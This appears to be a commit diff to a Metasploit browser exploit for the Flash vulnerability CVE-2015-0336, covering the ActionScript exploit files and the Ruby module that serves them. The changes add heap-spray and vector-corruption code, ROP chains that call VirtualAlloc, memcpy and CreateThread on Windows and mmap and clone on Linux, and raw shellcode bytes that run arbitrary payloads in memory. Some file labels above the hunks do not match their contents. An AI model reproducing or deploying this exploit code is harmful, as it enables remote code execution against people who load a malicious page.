Allow to execute payload from the flash renderer

Author: jvazquez-r7

data/exploits/CVE-2015-0336/msf.swf

@@ -28,8 +28,9 @@ package
         private var interval_id:uint
         private var trigger_swf:String 
         private var b64:Base64Decoder = new Base64Decoder()
-        private var payload:String
+        private var payload:ByteArray
         private var platform:String
+        private var original_length:uint = 0
 
         public function Exploit() 
         {
@@ -40,21 +41,23 @@ package
             var pattern:RegExp = / /g;
             b64_payload = b64_payload.replace(pattern, "+")
             b64.decode(b64_payload)
-            payload = b64.toByteArray().toString()
+            payload = b64.toByteArray()
 
             if (platform == 'win') { 
+                original_length = 0x1e
                 for (i = 0; i < 89698; i = i + 1) {
                     spray[i] = new Vector.<uint>(1014)
                     spray[i][0] = 0xdeadbeef
                     spray[i][1] = 0xdeedbeef
                     spray[i][2] = i
-                    spray[i][29] = 0x1a1e1429
+                    spray[i][29] = 0x14951429
                 }
 
                 for(i = 0; i < 89698; i = i + 1) {
                     spray[i].length = 0x1e
                 }
-            } else if (platform == 'linux') { 
+            } else if (platform == 'linux') {
+                original_length = 1022 
                 for (i = 0; i < 89698; i = i + 1) {
                     spray[i] = new Vector.<uint>(1022)
                     spray[i][0] = 0xdeadbeef
@@ -97,9 +100,11 @@ package
             for(var i:uint = 0; i < spray.length; i = i + 1) {
                 if (spray[i].length != 1022 && spray[i].length != 0x1e) {
                     Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16))
-                    spray[i][0x3ffffffe] = 0xffffffff
-                    spray[i][0x3fffffff] = spray[i][1023]
-                    uv = spray[i]
+                    spray[i][1022] = 0xffffffff                    
+                    spray[i + 1][0x3ffffbff] = spray[i][1023]
+                    spray[i + 1][0x3ffffbfe] = original_length
+                    uv = spray[i + 1]
+                    break
                 }
             }
 

data/exploits/CVE-2015-0336/trigger.swf

@@ -31,7 +31,6 @@ package
 
         public function lets_ready():void
         {
-            Logger.log("[*] ExploitByteArray - lets_ready()")
             ba.endian = "littleEndian"
             if (platform == "linux") {
                 ba.length = 0xffffffff
@@ -40,7 +39,6 @@ package
 
         public function is_ready():Boolean
         {
-            Logger.log("[*] ExploitByteArray - is_ready() - 0x" + ba.length.toString(16))
             if (ba.length == 0xffffffff)
                 return true
 
@@ -72,10 +70,15 @@ package
 
         public function write(addr:uint, value:* = 0, zero:Boolean = true):void
         {
+            var i:uint
+
             if (addr) ba.position = addr
             if (value is String) {
-                for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
                 if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
             } else ba.writeUnsignedInt(value)
         }
     }

external/source/exploits/CVE-2015-0336/Exploit.as

@@ -9,7 +9,7 @@ package
         private var exploit:Exploit
         private var ev:ExploitVector
         private var eba:ExploitByteArray
-        private var payload:String
+        private var payload:ByteArray
         private var platform:String
         private var pos:uint
         private var byte_array_object:uint
@@ -25,7 +25,7 @@ package
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(89698)
 
-        public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
+        public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void
         {
             exploit = exp
             payload = p
@@ -147,11 +147,16 @@ package
             var pe:PE = new PE(eba)
             var flash:uint = pe.base(vtable)
             var winmm:uint = pe.module("winmm.dll", flash)
-            var kernel32:uint = pe.module("kernel32.dll", winmm)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
             var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
             var winexec:uint = pe.procedure("WinExec", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
             var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
             var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
 
             // Continuation of execution
             eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
@@ -169,17 +174,35 @@ package
             eba.write(0, virtualprotect)
 
             // VirtualProtect
-            eba.write(0, winexec)
+            eba.write(0, virtualalloc)
             eba.write(0, buffer + 0x10)
             eba.write(0, 0x1000)
             eba.write(0, 0x40)
             eba.write(0, buffer + 0x8) // Writable address (4 bytes)
 
-            // WinExec
-            eba.write(0, buffer + 0x10)
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x70000000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x70000000)
             eba.write(0, payload_address + 8)
-            eba.write(0)
+            eba.write(0, payload.length) 
 
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x70000000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
             eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
             exploit.toString() // call method in the fake vtable
         }
@@ -192,6 +215,8 @@ package
             var libc:Elf = new Elf(eba, feof)
             var popen:uint = libc.symbol("popen")
             var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
             var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
             var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
             var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
@@ -204,9 +229,23 @@ package
             // 2) Recover original stack
             eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
 
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+        
+//            eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
+
             // Put the popen parameters in memory
-            eba.write(payload_address + 8, 'r', true) // type
-            eba.write(payload_address + 0xc, payload, true) // command
+            eba.write(payload_address + 0x8, payload, true) // false
 
             // Put the fake stack/vtable on memory 
             eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
@@ -221,13 +260,49 @@ package
             eba.write(0, buffer) // addr
             eba.write(0, 0x1000) // size
             eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
-            // Return to popen()
-            eba.write(stack_address + 0x18068, popen)
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
             // Return to CoE (fix stack and object vtable)
             eba.write(0, buffer + 0x10)
-            // popen() argument
-            eba.write(0, payload_address + 0xc)
-            eba.write(0, payload_address + 8) 
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
 
             //call   DWORD PTR [eax+0x24]
             //EAX: 0x41414141 ('AAAA')

external/source/exploits/CVE-2015-0336/ExploitByteArray.as

@@ -11,7 +11,6 @@ package
 
         public function base(addr:uint):uint
         {
-            Logger.log("[*] PE - base(): searching base for 0x" + addr.toString(16))
             addr &= 0xffff0000
             while (true) {
                 if (eba.read(addr) == 0x00905a4d) return addr
@@ -54,10 +53,20 @@ package
         public function gadget(gadget:String, hint:uint, addr:uint):uint
         {
             var find:uint = 0
+            var contents:uint = 0
             var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
             var value:uint = parseInt(gadget, 16)
-            for (var i:uint = 0; i < limit - 4; i++) if (value == (eba.read(addr + i) & hint)) break
-            return addr + i
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
         }
     }
 }

external/source/exploits/CVE-2015-0336/Exploiter.as

@@ -4,7 +4,7 @@ class Main
 {
 	public static function main(swfRoot:MovieClip):Void 
 	{
-		var _loc2_ = _global.ASnative(2100, 0x1a1e2000);
+		var _loc2_ = _global.ASnative(2100, 0x14950000);
 		var _loc3_ = new Object();
 		_loc2_.__proto__ = _loc3_; 
 		_global.ASnative(2100, 200)(_loc3_); //Netconnection constructor

external/source/exploits/CVE-2015-0336/PE.as

@@ -8,7 +8,6 @@
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -44,8 +43,8 @@ def initialize(info={})
         {
           'DisableNops' => true
         },
-      'Platform'            => ['win', 'unix'],
-      'Arch'                => [ARCH_X86, ARCH_CMD],
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
@@ -57,7 +56,7 @@ def initialize(info={})
           :ua_name => lambda do |ua|
             case target.name
             when 'Windows'
-              return true if ua == Msf::HttpClients::IE
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
             when 'Linux'
               return true if ua == Msf::HttpClients::FF
             end
@@ -79,14 +78,12 @@ def initialize(info={})
         [
           [ 'Windows',
             {
-              'Platform' => 'win',
-              'Arch'     => ARCH_X86
+              'Platform' => 'win'
             }
           ],
           [ 'Linux',
             {
-              'Platform' => 'unix',
-              'Arch'     => ARCH_CMD
+              'Platform' => 'linux'
             }
           ]
         ],
@@ -117,15 +114,12 @@ def on_request_exploit(cli, request, target_info)
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
 
     if target.name =~ /Windows/
-      target_payload = get_payload(cli, target_info)
-      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-      b64_payload = Rex::Text.encode_base64(psh_payload)
       platform_id = 'win'
     elsif target.name =~ /Linux/
-      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
-      b64_payload = Rex::Text.encode_base64(target_payload)
       platform_id = 'linux'
     end